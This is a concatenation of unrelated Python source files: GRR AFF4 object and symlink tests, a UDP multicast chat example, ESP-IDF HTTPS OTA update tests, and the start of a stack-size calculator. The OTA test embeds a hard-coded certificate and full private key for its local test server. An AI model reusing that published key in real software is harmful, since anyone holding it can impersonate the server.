"aff4:/obj", ObjectWithLockProtectedAttribute, token=self.token)
obj.Close()
# Lock-protected attribute can't be set when plain Open() is used.
obj = aff4.FACTORY.Open("aff4:/obj", mode="rw", token=self.token)
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
self.assertRaises(IOError, obj.Set, obj.Schema.LOCK_PROTECTED_ATTR("value"))
obj.Close()
# Lock-protected attribute is successfully set, because the object is
# locked with OpenWithLock().
with aff4.FACTORY.OpenWithLock("aff4:/obj", token=self.token) as obj:
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
obj.Set(obj.Schema.LOCK_PROTECTED_ATTR("value"))
# We can't respect locks during blind-write operations.
obj = aff4.FACTORY.Create(
"aff4:/obj", ObjectWithLockProtectedAttribute, token=self.token)
obj.Set(obj.Schema.UNPROTECTED_ATTR("value"))
obj.Set(obj.Schema.LOCK_PROTECTED_ATTR("value"))
obj.Close()
def testAddLabelsCallAddsMultipleLabels(self):
"""Check we can set and remove labels."""
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
labels = ["label1", "label2", "label3"]
client.AddLabels(labels)
# Check that labels are correctly set in the current object.
self.assertListEqual(labels, client.GetLabelsNames())
# Check that labels are correctly set in the object that is fresh from the
# data store.
client = aff4.FACTORY.Open("C.0000000000000001", token=self.token)
self.assertListEqual(labels, client.GetLabelsNames())
def testRemoveLabelsCallRemovesMultipleLabels(self):
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
labels = ["label1", "label2", "label3"]
client.AddLabels(labels)
with aff4.FACTORY.Create(
"C.0000000000000001",
aff4_grr.VFSGRRClient,
mode="rw",
token=self.token) as client:
client.RemoveLabel("label1")
self.assertEqual(["label2", "label3"], list(client.GetLabelsNames()))
def testPathSpecInterpolation(self):
# Create a base directory containing a pathspec.
os_urn = rdfvalue.RDFURN("aff4:/C.0000000000000002/fs/os")
pathspec = rdf_paths.PathSpec(
path="/", pathtype=rdf_paths.PathSpec.PathType.OS)
additional_path = "/var/log"
fd = aff4.FACTORY.Create(
os_urn, aff4_standard.VFSDirectory, token=self.token)
fd.Set(fd.Schema.PATHSPEC(pathspec))
fd.Close()
# Now we open a path below this aff4 directory.
fd = aff4.FACTORY.Create(
os_urn.Add(additional_path),
aff4_standard.VFSDirectory,
mode="rw",
token=self.token)
flow_id = fd.Update(attribute="CONTAINS")
flow_obj = aff4.FACTORY.Open(flow_id, token=self.token)
self.assertEqual(flow_obj.args.pathspec.pathtype, pathspec.pathtype)
self.assertEqual(flow_obj.args.pathspec.CollapsePath(), additional_path)
def testExistsWithTypeReturnsFalseWhenNoObject(self):
self.assertFalse(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
def testExistsWithTypeReturnsFalseWhenObjectHasWrongType(self):
with aff4.FACTORY.Create(
"aff4:/foo/bar", aff4.AFF4MemoryStream, token=self.token):
pass
self.assertFalse(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
def testExistsWithTypeReturnsTrueWhenObjectHasCorrectType(self):
with aff4.FACTORY.Create(
"aff4:/foo/bar", aff4_standard.VFSDirectory, token=self.token):
pass
self.assertTrue(
aff4.FACTORY.ExistsWithType(
"aff4:/foo/bar",
aff4_type=aff4_standard.VFSDirectory,
token=self.token))
# TODO(amoser): re-work this test and re-enable.
def disabled_testAFF4Initialization(self):
blacklist = set([aff4.AFF4Stream, aff4_grr.VFSGRRClient])
factory = aff4.FACTORY
for cls in itervalues(aff4.AFF4Object.classes):
if cls not in blacklist:
with utils.Stubber(aff4, "FACTORY", None):
try:
factory.Create("aff4:/test_object", cls, token=self.token)
except AttributeError as e:
self.fail("Class %s used aff4.FACTORY during init: %s" % (cls, e))
class AFF4SymlinkTestSubject(aff4.AFF4Volume):
"""A test subject for AFF4SymlinkTest."""
class SchemaCls(aff4.AFF4Object.SchemaCls):
SOME_STRING = aff4.Attribute("metadata:some_string", rdfvalue.RDFString,
"SomeString")
def Initialize(self):
self.test_var = 42
def testMethod(self):
return str(self.Get(self.Schema.SOME_STRING)) + "-suffix"
class AFF4SymlinkTest(aff4_test_lib.AFF4ObjectTest):
"""Tests the AFF4Symlink."""
symlink_source_urn = rdfvalue.RDFURN("aff4:/symlink")
symlink_target_urn = rdfvalue.RDFURN("aff4:/C.0000000000000001")
def CreateAndOpenObjectAndSymlink(self):
with aff4.FACTORY.Create(
self.symlink_target_urn, AFF4SymlinkTestSubject,
token=self.token) as fd:
fd.Set(fd.Schema.SOME_STRING, rdfvalue.RDFString("the_string"))
with aff4.FACTORY.Create(
self.symlink_source_urn, aff4.AFF4Symlink, token=self.token) as symlink:
symlink.Set(symlink.Schema.SYMLINK_TARGET, self.symlink_target_urn)
fd = aff4.FACTORY.Open(self.symlink_target_urn, token=self.token)
symlink = aff4.FACTORY.Open(self.symlink_source_urn, token=self.token)
return (fd, symlink)
def testOpenedSymlinkUrnIsEqualToTargetUrn(self):
fd, symlink_obj = self.CreateAndOpenObjectAndSymlink()
self.assertEqual(symlink_obj.urn, fd.urn)
def testOpenedObjectHasSymlinkUrnAttributeSet(self):
_, symlink_obj = self.CreateAndOpenObjectAndSymlink()
self.assertIsNotNone(symlink_obj.symlink_urn)
self.assertEqual(symlink_obj.urn, self.symlink_target_urn)
self.assertEqual(symlink_obj.symlink_urn, self.symlink_source_urn)
def testMultiOpenMixedObjects(self):
"""Test symlinks are correct when using multiopen with other objects."""
fd, _ = self.CreateAndOpenObjectAndSymlink()
fd_urn1 = fd.urn
fd_urn2 = rdfvalue.RDFURN("aff4:/C.0000000000000002")
fd = aff4.FACTORY.Create(fd_urn2, aff4.AFF4Image, token=self.token)
fd.Close()
for fd in aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
token=self.token):
if fd.urn == fd_urn2:
self.assertIsInstance(fd, aff4.AFF4Image)
elif fd.urn == fd_urn1:
self.assertIsInstance(fd, AFF4SymlinkTestSubject)
self.assertIsNotNone(fd.symlink_urn)
self.assertEqual(fd.urn, self.symlink_target_urn)
self.assertEqual(fd.symlink_urn, self.symlink_source_urn)
else:
raise ValueError("Unexpected URN: %s" % fd.urn)
def testMultiOpenMixedObjectWithCheckedAff4Type(self):
fd, _ = self.CreateAndOpenObjectAndSymlink()
fd_urn2 = rdfvalue.RDFURN("aff4:/C.0000000000000002")
fd = aff4.FACTORY.Create(fd_urn2, aff4.AFF4Image, token=self.token)
fd.Close()
# AFF4Image object should be ignored due to aff4_type check.
# At the same, type check shouldn't filter out the symlink,
# but should check the symlinked object.
fds = list(
aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
aff4_type=AFF4SymlinkTestSubject,
token=self.token))
self.assertLen(fds, 1)
self.assertIsInstance(fds[0], AFF4SymlinkTestSubject)
# AFF4Image should be returned, but symlinked AFF4SymlinkTestSubject should
# get filtered out due to aff4_type restriction.
fds = list(
aff4.FACTORY.MultiOpen([self.symlink_source_urn, fd_urn2],
aff4_type=aff4.AFF4Image,
token=self.token))
self.assertLen(fds, 1)
self.assertIsInstance(fds[0], aff4.AFF4Image)
def testOpenedSymlinkAFF4AttributesAreEqualToTarget(self):
fd, symlink_obj = self.CreateAndOpenObjectAndSymlink()
for attr in fd.Schema.ListAttributes():
self.assertEqual(symlink_obj.Get(attr), fd.Get(attr))
def main(argv):
# Run the full test suite
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
multicast_test.py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import time, socket, threading, os
# 定义本机IP地址
SENDERIP = '192.168.1.88'
# 定义本地端口
SENDERPORT = 30000
# 定义本程序的多点广播IP地址
MYGROUP = '230.0.0.1'
# 通过type属性指定创建基于UDP协议的socket
s = socket.socket(type=socket.SOCK_DGRAM)
# 将该socket绑定到0.0.0.0的虚拟IP
s.bind(('0.0.0.0', SENDERPORT)) # ①
# 设置广播消息的TTL(Time-To-Live)
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 64)
# 设置允许多点广播使用相同的端口
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 将socket进入广播组
status = s.setsockopt(socket.IPPROTO_IP,
socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(MYGROUP) + socket.inet_aton(SENDERIP))
# 定义从socket读取数据的方法
def read_socket(sock):
while True:
data = sock.recv(2048)
print("信息: ", data.decode('utf-8'))
# 以read_socket作为target启动多线程
threading.Thread(target=read_socket, args=(s, )).start()
# 采用循环不断读取键盘输入,并输出到socket中
while True:
line = input('')
if line is None or line == 'exit':
break
os._exit(0)
# 将line输出到socket中
s.sendto(line.encode('utf-8'), (MYGROUP, SENDERPORT))
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
import subprocess
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, "w+") as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, "server_key.pem")
create_file(key_file, server_key)
return server_file, key_file
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(["openssl", "s_server", "-WWW", "-key", key_file, "-cert", server_file, "-port", str(server_port)])
return chunked_server
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
print("Sending resp, URL: " + url)
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
return RedirectHandler
def start_redirect_server(ota_image_dir, server_ip, server_port, redirection_port):
os.chdir(ota_image_dir)
server_file, key_file = get_ca_cert(ota_image_dir)
redirectHandler = redirect_handler_factory("https://" + server_ip + ":" + str(redirection_port) + "/advanced_https_ota.bin")
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
redirectHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# Number of iterations to validate OTA
iterations = 3
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_bin(env, extra_data):
"""
Working of OTA if binary file is truncated is validated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated.bin"
# Size of truncated file to be grnerated. This value can range from 288 bytes (Image header size) to size of original binary file
# truncated_bin_size is set to 64000 to reduce consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("Image validation failed, image is corrupted", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_truncated_header(env, extra_data):
"""
Working of OTA if headers of binary file are truncated is vaildated in this test case.
Application should return with error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Original binary file generated after compilation
bin_name = "advanced_https_ota.bin"
# Truncated binary file to be generated from original binary file
truncated_bin_name = "truncated_header.bin"
# Size of truncated file to be grnerated. This value should be less than 288 bytes (Image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, "r+")
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), "w+")
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + truncated_bin_name)
dut1.expect("advanced_https_ota_example: esp_https_ota_read_img_desc failed", timeout=30)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_random(env, extra_data):
"""
Working of OTA if random data is added in binary file are validated in this test case.
Magic byte verification should fail in this case.
steps: |
1. join AP
2. Generate random binary image
3. Fetch OTA image over HTTPS
4. Check working of code for random binary file
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Random binary file to be generated
random_bin_name = "random.bin"
# Size of random binary file. 32000 is choosen, to reduce the time required to run the test-case
random_bin_size = 32000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, random_bin_name)
fo = open(binary_file, "w+")
# First byte of binary file is always set to zero. If first byte is generated randomly,
# in some cases it may generate 0xE9 which will result in failure of testcase.
fo.write(str(0))
for i in range(random_bin_size - 1):
fo.write(str(random.randrange(0,255,1)))
fo.close()
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name))
dut1.write("https://" + host_ip + ":" + str(server_port) + "/" + random_bin_name)
dut1.expect("esp_ota_ops: OTA image has invalid magic byte", timeout=10)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_chunked(env, extra_data):
"""
This is a positive test case, which downloads complete binary file multiple number of times.
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8070/" + bin_name))
dut1.write("https://" + host_ip + ":8070/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
chunked_server.kill()
os.remove(os.path.join(dut1.app.binary_path, "server_cert.pem"))
os.remove(os.path.join(dut1.app.binary_path, "server_key.pem"))
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_advanced_https_ota_example_redirect_url(env, extra_data):
"""
This is a positive test case, which starts a server and a redirection server.
Redirection server redirects http_request to different port
Number of iterations can be specified in variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("advanced_https_ota_example", "examples/system/ota/advanced_https_ota", dut_class=ttfw_idf.ESP32DUT)
server_port = 8001
# Port to which the request should be redirecetd
redirection_server_port = 8081
# File to be downloaded. This file is generated after compilation
bin_name = "advanced_https_ota.bin"
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("advanced_https_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("advanced_https_ota_bin_size", bin_size // 1024)
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
thread2 = Thread(target=start_redirect_server, args=(dut1.app.binary_path, host_ip, redirection_server_port, server_port))
thread2.daemon = True
thread2.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
thread2.close()
dut1.expect("Starting Advanced OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name))
dut1.write("https://" + host_ip + ":" + str(redirection_server_port) + "/" + bin_name)
dut1.expect("Loaded app from partition at offset", timeout=60)
dut1.expect("Starting Advanced OTA example", timeout=30)
dut1.reset()
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
|
bmptk-ssc.py
|
# ===========================================================================
#
# BMPTK's Stack Size Calculator:
# calculate the stack use from an .lss file
#
# (c) Wouter van Ooijen (wouter@voti.nl)
# 2015-12-18 version 0.1 work-in-progress
# license: Boost Software License - Version 1.0
#
# ===========================================================================
#
# Known limitations
#
# tested only on Windows
# correct lss format is assumed, not (always) checked
# hand-written asm code often causes trouble
# only a top-level unused subroutine is reported as 'never called'
# only a few simple sp-changing sequences are supported
# (and not fully checked)
#
# ===========================================================================
#
# ToDo list
#
# warn bij in-balance
# what to do with a routine that just jumps to iself? like __aeabi_idiv0
# test recursion, virtuals
# avr __bad_interrupt chained to main??
#
# ===========================================================================
from __future__ import print_function
import operator, subprocess, sys, os, argparse, threading
def demangle( filt, name ):
"de-mangle a C++ functionn name using the c++filt tool"
if filt:
return subprocess.check_output( [ filt , name] ).decode("utf-8").strip()
else:
return name
def file_from_text( file_name, text ):
"write the string text to the file_name"
f = open( file_name, "w" )
f.write( text )
f.close()
def text_from_file( file_name ):
"return the text in the file"
f = open( file_name, "r" )
result = f.read()
f.close()
return result
